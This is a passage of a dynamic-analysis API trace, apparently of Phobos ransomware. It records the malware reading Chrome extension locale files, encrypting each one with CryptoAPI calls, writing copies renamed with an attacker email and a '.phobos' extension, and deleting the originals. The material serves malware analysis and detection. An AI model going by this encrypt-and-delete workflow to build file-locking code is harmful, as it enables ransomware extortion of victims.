lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.769] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0151.769] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.769] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.769] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.769] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.769] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.769] CloseHandle (hObject=0x138) returned 1 [0151.769] CloseHandle (hObject=0x130) returned 1 [0151.770] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json")) returned 1 [0151.770] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.770] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.771] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.771] CloseHandle (hObject=0x130) returned 1 [0151.771] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json")) returned 0x2020 [0151.771] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.771] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.771] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.771] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.771] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.771] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.772] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.772] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.772] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.772] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.773] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0151.773] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.773] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.773] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.773] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.774] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.774] CloseHandle (hObject=0x130) returned 1 [0151.774] CloseHandle (hObject=0x138) returned 1 [0151.774] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json")) returned 1 [0151.775] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.775] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.775] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.775] CloseHandle (hObject=0x138) returned 1 [0151.775] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json")) returned 0x2020 [0151.775] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.775] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.776] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.776] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.776] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.776] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.776] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.776] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.777] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.777] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.778] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0151.778] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.778] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.778] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.778] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.778] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.778] CloseHandle (hObject=0x138) returned 1 [0151.778] CloseHandle (hObject=0x130) returned 1 [0151.778] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json")) returned 1 [0151.779] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.779] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.779] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.779] CloseHandle (hObject=0x130) returned 1 [0151.779] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json")) returned 0x2020 [0151.779] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.779] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.780] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.780] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.780] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.780] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.780] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.780] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.781] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.781] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.782] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0151.782] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.782] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.782] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.782] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.782] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.782] CloseHandle (hObject=0x130) returned 1 [0151.782] CloseHandle (hObject=0x138) returned 1 [0151.782] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json")) returned 1 [0151.783] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.783] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.783] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.783] CloseHandle (hObject=0x138) returned 1 [0151.784] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json")) returned 0x2020 [0151.784] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.784] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.784] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.784] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.784] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.784] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.784] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.784] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.785] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.785] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.786] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0151.786] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.786] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.786] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.786] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.787] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.787] CloseHandle (hObject=0x138) returned 1 [0151.787] CloseHandle (hObject=0x130) returned 1 [0151.787] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json")) returned 1 [0151.788] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: 